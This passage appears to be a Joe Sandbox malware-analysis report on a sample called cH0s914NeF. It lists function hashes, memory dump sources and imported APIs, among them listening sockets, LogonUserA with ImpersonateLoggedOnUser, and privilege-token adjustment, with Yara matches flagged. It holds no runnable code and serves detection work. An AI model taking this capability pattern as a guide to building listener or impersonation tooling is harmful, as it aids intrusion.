String ID: 0K$0K$0K$0K$0K$0K$0K$0K$`+J
API String ID: 4206212132-928286963
Opcode ID: 157dd117c32c32105bed492656a44e785223b8f2ff59cb9e667db3af333a9847
Instruction ID: 011711fd91e85f04b3ea8690bd37b6c802f7ff195a7debcbdf4140625166a860
Opcode Fuzzy Hash: 157dd117c32c32105bed492656a44e785223b8f2ff59cb9e667db3af333a9847
Instruction Fuzzy Hash: 09D1BBE3B51A0090EE18EBA6E4D13696721BFBAB88F841427DE0D07761DF6CD895C31D

Uniqueness

Uniqueness Score: -1.00%

Function 00424FE0 Relevance: 10.6, Strings: 8, Instructions: 561COMMON

Download Yara Rule

Strings

p3K, xrefs: 00425399
0F, xrefs: 004257C7
PF, xrefs: 004259AE
@!K, xrefs: 00425980
P K, xrefs: 004258F2
cannot create shim for unknown locale::facet, xrefs: 00425A73
K, xrefs: 00425939
pF, xrefs: 0042546F

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: 0F$@!K$P K$PF$cannot create shim for unknown locale::facet$p3K$pF$ K
API String ID: 0-2697864829
Opcode ID: b3e13b40a78584d2e71729bcebc012116be838bc3628aa8c6f0cc08530af43c2
Instruction ID: 80f6344b2d6527ef6a27c23f1fb669e843bacdc8340b6f85bfab05de158882ba
Opcode Fuzzy Hash: b3e13b40a78584d2e71729bcebc012116be838bc3628aa8c6f0cc08530af43c2
Instruction Fuzzy Hash: D6528BB2304B80D7E7588F26F5A530A77A0F355B88F54801ACB8907BA1DB7DE475C39A

Uniqueness

Uniqueness Score: -1.00%

Function 03A75100 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 03A75138
htons.WS2_32 ref: 03A75158
ioctlsocket.WS2_32 ref: 03A75174
closesocket.WS2_32 ref: 03A75182
bind.WS2_32 ref: 03A75195
listen.WS2_32 ref: 03A751A5

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: bindclosesockethtonsioctlsocketlistensocket
String ID:
API String ID: 1767165869-0
Opcode ID: 00106a6ad1e19a2568f5e355a5f7b5f41c24474b7da708c1ecfc5d75562f020d
Instruction ID: 387e3379f39dea0a6851f6a5113bc48fe51a2eb4270a2ffc73bf319289d9d285
Opcode Fuzzy Hash: 00106a6ad1e19a2568f5e355a5f7b5f41c24474b7da708c1ecfc5d75562f020d
Instruction Fuzzy Hash: A0112232B0075082DB24EF12E84032DB3A5F389FB5F89462ADEAA17794CF3CD5458701

Uniqueness

Uniqueness Score: -1.00%

Function 03A74CF8 Relevance: 9.1, APIs: 6, Instructions: 57networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 03A74D20
htons.WS2_32 ref: 03A74D2C
socket.WS2_32 ref: 03A74D44
closesocket.WS2_32 ref: 03A74D56
bind.WS2_32 ref: 03A74D83
ioctlsocket.WS2_32 ref: 03A74D9D

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: bindclosesockethtonlhtonsioctlsocketsocket
String ID:
API String ID: 3910169428-0
Opcode ID: e5609d3337b011382687551e59e102a1dae304545505bb00b23c1231bff3c0b8
Instruction ID: 80c0fa0c57289b93ef40c0c355393adccccfb8c214aae478d9e6a9b70725c654
Opcode Fuzzy Hash: e5609d3337b011382687551e59e102a1dae304545505bb00b23c1231bff3c0b8
Instruction Fuzzy Hash: 7511AC7A310B5087E754DF22E8543997760F789BA4F55832ACEAA53390DF3CCA4AC740

Uniqueness

Uniqueness Score: -1.00%

Function 03A7BEF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03A7BC70: RevertToSelf.ADVAPI32 ref: 03A7BC8D

LogonUserA.ADVAPI32 ref: 03A7BF38
GetLastError.KERNEL32 ref: 03A7BF42

Part of subcall function 03A7473C: malloc.LIBCMT ref: 03A74758

Part of subcall function 03A6FA80: MultiByteToWideChar.KERNEL32 ref: 03A6FAAD
Part of subcall function 03A6FA80: MultiByteToWideChar.KERNEL32 ref: 03A6FAD5

Part of subcall function 03A6CFCC: malloc.LIBCMT ref: 03A6CFDF

ImpersonateLoggedOnUser.ADVAPI32 ref: 03A7BF60
GetLastError.KERNEL32 ref: 03A7BF6A

Strings

%s\%s, xrefs: 03A7C024

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiUserWidemalloc$ImpersonateLoggedLogonRevertSelf
String ID: %s\%s
API String ID: 3621627092-4073750446
Opcode ID: ce1ddc4cc406a6b86e948808d9d577ee996a93c47919ca10f4bbc8531711b80e
Instruction ID: 37cecc17f3c46a07c8e791dd8a920a10298478997852ee4dbbc0991a2330a8b1
Opcode Fuzzy Hash: ce1ddc4cc406a6b86e948808d9d577ee996a93c47919ca10f4bbc8531711b80e
Instruction Fuzzy Hash: AB316B26314F4486EB01EB62F99871A3769EB8ABC0F40402AD98E5BB54DF3CC245C752

Uniqueness

Uniqueness Score: -1.00%

Function 03A6F654 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03A6F675
Sleep.KERNEL32 ref: 03A6F6E4
GetTickCount.KERNEL32 ref: 03A6F6EA
Sleep.KERNEL32 ref: 03A6F703
closesocket.WS2_32 ref: 03A6F70C

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: CountSleepTick$closesocket
String ID:
API String ID: 2363407838-0
Opcode ID: 33db7c2da52236c42fae74785d1bcb7574fb57a2df4d5ea3a285f2db53541465
Instruction ID: 72881ec9ae2d2d3fc40e2f59b9f18d88cb3afc5dee2b57035622a4e78d7b288d
Opcode Fuzzy Hash: 33db7c2da52236c42fae74785d1bcb7574fb57a2df4d5ea3a285f2db53541465
Instruction Fuzzy Hash: FC11933570478482DA10EB62F99421EA390B78ABF0F444727DEBE4BBE4DE3CC6468701

Uniqueness

Uniqueness Score: -1.00%

Function 0040BAE0 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0040BB25
GetCurrentProcessId.KERNEL32 ref: 0040BB30
GetCurrentThreadId.KERNEL32 ref: 0040BB39
GetTickCount.KERNEL32 ref: 0040BB41
QueryPerformanceCounter.KERNEL32 ref: 0040BB4E

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: b3ce76caa77562ea6e4e2c9eca3d2f555933119998c3a8d7a18053e09341c61c
Instruction ID: 7c2ebc7da2e62b81cbe56f205ff8e0252a1a44ea0c73017bf29165a9ed05e1e4
Opcode Fuzzy Hash: b3ce76caa77562ea6e4e2c9eca3d2f555933119998c3a8d7a18053e09341c61c
Instruction Fuzzy Hash: C9119EA6752B4092FB104B25BE183197361B7897F1F881332DE9D43BA4EB3CC484C308

Uniqueness

Uniqueness Score: -1.00%

Function 03A7CE10 Relevance: 7.6, APIs: 5, Instructions: 53networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

socket.WS2_32 ref: 03A7CE45
closesocket.WS2_32 ref: 03A7CE57
htons.WS2_32 ref: 03A7CE68
bind.WS2_32 ref: 03A7CE89
listen.WS2_32 ref: 03A7CE9E

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: bindclosesockethtonslistensocket
String ID:
API String ID: 564772725-0
Opcode ID: 693a9b11f937d3efc85ee89bf6cc7c32527a322075b8e36231fcd70ee6315e40
Instruction ID: 4feebb2c671f2ca281631aca55f58c649f45f37bc5e24fd34de686fa493b940e
Opcode Fuzzy Hash: 693a9b11f937d3efc85ee89bf6cc7c32527a322075b8e36231fcd70ee6315e40
Instruction Fuzzy Hash: 8911D02632079482EA20DF12E84432AB365FB85FE4F484626DAE91BB94CF3CC205C705

Uniqueness

Uniqueness Score: -1.00%

Function 03A6FE7C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

LookupPrivilegeValueA.ADVAPI32 ref: 03A6FEF6
AdjustTokenPrivileges.ADVAPI32 ref: 03A6FF26
GetLastError.KERNEL32 ref: 03A6FF30

Strings

%s, xrefs: 03A6FF3E

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID: %s
API String ID: 4244140340-620797490
Opcode ID: 6c791bb4c01fc26c469951e3acf1c760b9cd35fe10ce13bee0a408dd74bcb015
Instruction ID: 3228104be7b43d6fbfad015ac8fd4ecf5e3abbef222b0f7c48cb28e0e3346490
Opcode Fuzzy Hash: 6c791bb4c01fc26c469951e3acf1c760b9cd35fe10ce13bee0a408dd74bcb015
Instruction Fuzzy Hash: 7C213B72B00B449EE710DB71E4447AD73A9A749B88F45446A8E5CA7B48EF74C619C380

Uniqueness

Uniqueness Score: -1.00%

Function 00416570 Relevance: 6.6, APIs: 4, Instructions: 576COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 00416591

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: localeconv
String ID:
API String ID: 3737801528-0
Opcode ID: f777d801b84f9ad828d138c9bfb42598abf11fc3650290873e0e8119aacb5a1d
Instruction ID: 009619b4835bcc3299f829e1ef837c64b73277850dcdaaf1ae5446f74aa1693b
Opcode Fuzzy Hash: f777d801b84f9ad828d138c9bfb42598abf11fc3650290873e0e8119aacb5a1d
Instruction Fuzzy Hash: 041265727182A04BDB348F2595547EF7A91E381788F4B811BDE9647B85DB3DD8C2CB08

Uniqueness

Uniqueness Score: -1.00%

Function 03A73FA4 Relevance: 6.1, APIs: 4, Instructions: 73sleepnetworkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03A73FCB
Sleep.KERNEL32 ref: 03A7401A
GetTickCount.KERNEL32 ref: 03A74020
WSAGetLastError.WS2_32 ref: 03A7402A

Part of subcall function 03A74170: ioctlsocket.WS2_32 ref: 03A74192

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: CountTick$ErrorLastSleepioctlsocket
String ID:
API String ID: 1121440892-0
Opcode ID: 5bf99a04f972f50d73caa8e18fab9a55977dc0de2e5c5f24fa58e569c163d702
Instruction ID: 53462f02d44d42a58276f09ad0bacce5520b91411598bb99033aa95fc520a762
Opcode Fuzzy Hash: 5bf99a04f972f50d73caa8e18fab9a55977dc0de2e5c5f24fa58e569c163d702
Instruction Fuzzy Hash: 1531283AB04B40C6DB10DBA2E9942AC77B9F389B94F55422ACF6EA7794CF34C556C340

Uniqueness

Uniqueness Score: -1.00%

Function 00415001 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 1221COMMON

Download Yara Rule

Strings

, xrefs: 00416516
, xrefs: 00416484

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: bac055c0795f5675831f257c476ac1dd32bb1b7850c96b38c2a9c9c6d0eb8ca6
Instruction ID: 2ca5328e983729d7f1a5ad794123e8966227e7d8100f476d35dfad2fdb275d28
Opcode Fuzzy Hash: bac055c0795f5675831f257c476ac1dd32bb1b7850c96b38c2a9c9c6d0eb8ca6
Instruction Fuzzy Hash: 98B2BE72618A84CBC7258F2AE0447DBB7A1F7C57C4F10821AEE8A47B19EB7DD4818F45

Uniqueness

Uniqueness Score: -1.00%

Function 00438A60 Relevance: 5.4, Strings: 4, Instructions: 377COMMON

Download Yara Rule

Strings

basic_string::append, xrefs: 0043913D, 00439185, 004391CC
basic_string::erase, xrefs: 004391C0
, xrefs: 00438F65
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 004391B6

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: $%s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append$basic_string::erase
API String ID: 0-3660802673
Opcode ID: db519da6fb5d8ee4d21fd33e51407a44ee30b0226c8badc9ea444a1822f0e27d
Instruction ID: 632b03bbf801606d5a0bc07c2b311b0efc799b0071a89e85d38a585b2a2976ba
Opcode Fuzzy Hash: db519da6fb5d8ee4d21fd33e51407a44ee30b0226c8badc9ea444a1822f0e27d
Instruction Fuzzy Hash: 64F19B72218B8086DB20DF6AE44435FB7A1F789B88F40912AEB8D47B59DF7CC444CB48

Uniqueness

Uniqueness Score: -1.00%

Function 004382D0 Relevance: 5.4, Strings: 4, Instructions: 375COMMON

Download Yara Rule

Strings

basic_string::append, xrefs: 004389AD, 004389F5, 00438A3C
basic_string::erase, xrefs: 00438A30
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00438A26
, xrefs: 004387D5

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: $%s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append$basic_string::erase
API String ID: 0-3660802673
Opcode ID: 6dbb62102e3974f48ebe30cd847f2891281fa4a3fc312c624bda0c98536182cf
Instruction ID: c59cb8924195a3c155e476f4ef3674d54cc72525a69e118523416b26d0461657
Opcode Fuzzy Hash: 6dbb62102e3974f48ebe30cd847f2891281fa4a3fc312c624bda0c98536182cf
Instruction Fuzzy Hash: 88F16A72214B8086CB20DF6AE45435FBBA1F789B98F44911AEB8D47B59DF7CC444CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0049B420 Relevance: 5.0, APIs: 2, Strings: 1, Instructions: 466COMMON

Download Yara Rule

Strings

basic_string::append, xrefs: 0049B77C

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: basic_string::append
API String ID: 0-3811946249
Opcode ID: cffcb19a331f9d76337180124968ab18f813514c17f3cee820c5be6fc39a443d
Instruction ID: d4b5ca46d8f48011278650d9f8e22ae675cd5887323d054ab483f6f1f04d91cc
Opcode Fuzzy Hash: cffcb19a331f9d76337180124968ab18f813514c17f3cee820c5be6fc39a443d
Instruction Fuzzy Hash: C3F18262705A9881CF149F2AE64432E6B61F785FE8F148623DF5E077A9DB3CC852C385

Uniqueness

Uniqueness Score: -1.00%

Function 03A6D784 Relevance: 4.9, APIs: 3, Instructions: 397memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03A74864: htonl.WS2_32 ref: 03A74881

GetLastError.KERNEL32 ref: 03A6DA74

Part of subcall function 03A7ADBC: GetCurrentProcess.KERNEL32 ref: 03A7AE49

HeapCreate.KERNEL32 ref: 03A6DA1B
HeapAlloc.KERNEL32 ref: 03A6DA39

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: Heap$AllocCreateCurrentErrorLastProcesshtonl
String ID:
API String ID: 3419463915-0
Opcode ID: c3210aeb038c61ac2ac1f21ef91652db53eb4006541b35b7449dfd283ffbea81
Instruction ID: 4bcd2f50a05b25d8f70ff63ebda012612fa2c6db4b3f437c1747fca7e030d8ff
Opcode Fuzzy Hash: c3210aeb038c61ac2ac1f21ef91652db53eb4006541b35b7449dfd283ffbea81
Instruction Fuzzy Hash: 49E15DA7710B4187EB24DB36EC843AA73A1F789794F098526CB9A9BB55DF3CE141C340

Uniqueness

Uniqueness Score: -1.00%

Function 004A0BD0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

malloc.MSVCRT(?,?,FFFFFFFF,004661FD,?,?,FFFFFFFF,00465C90,basic_ios::clear,?,basic_ios::clear,00467549), ref: 004A0BE7

Strings

0K, xrefs: 004A0C30

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: malloc
String ID: 0K
API String ID: 2803490479-3234548752
Opcode ID: 6a00e3fe9604100a9d1c0ea880c8dd7ee158caae3a1c3e63bbb07640c6eea6db
Instruction ID: 38955675da748f6cfcbed42f8c434a3ecb6ac105639f7d57c6e5da9f1fcc5076
Opcode Fuzzy Hash: 6a00e3fe9604100a9d1c0ea880c8dd7ee158caae3a1c3e63bbb07640c6eea6db
Instruction Fuzzy Hash: E401D1A1B4330954FE5DA79AB8513A502405F5B7A8F8C193E9D1E0B342EE2DC891C318

Uniqueness

Uniqueness Score: -1.00%

Function 03A7BE68 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 03A7BEB7
CheckTokenMembership.ADVAPI32 ref: 03A7BECE
FreeSid.ADVAPI32 ref: 03A7BEDF

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 2c77dacb1de5e0caea413dc5d861356a64d8f410a91bc4e8cba07f6cddbc2151
Instruction ID: 8bfff486ac6a6cf72830c2e978119844d94529da7fd5c6b07551e11736e2fafc
Opcode Fuzzy Hash: 2c77dacb1de5e0caea413dc5d861356a64d8f410a91bc4e8cba07f6cddbc2151
Instruction Fuzzy Hash: DB015E73624A818FE720CF20E4493AD33B4F3557AEF010909E68946A98CB7CC258CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0046544A Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

@AK, xrefs: 0046544D
pJ, xrefs: 00465499
pWF, xrefs: 00465489

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
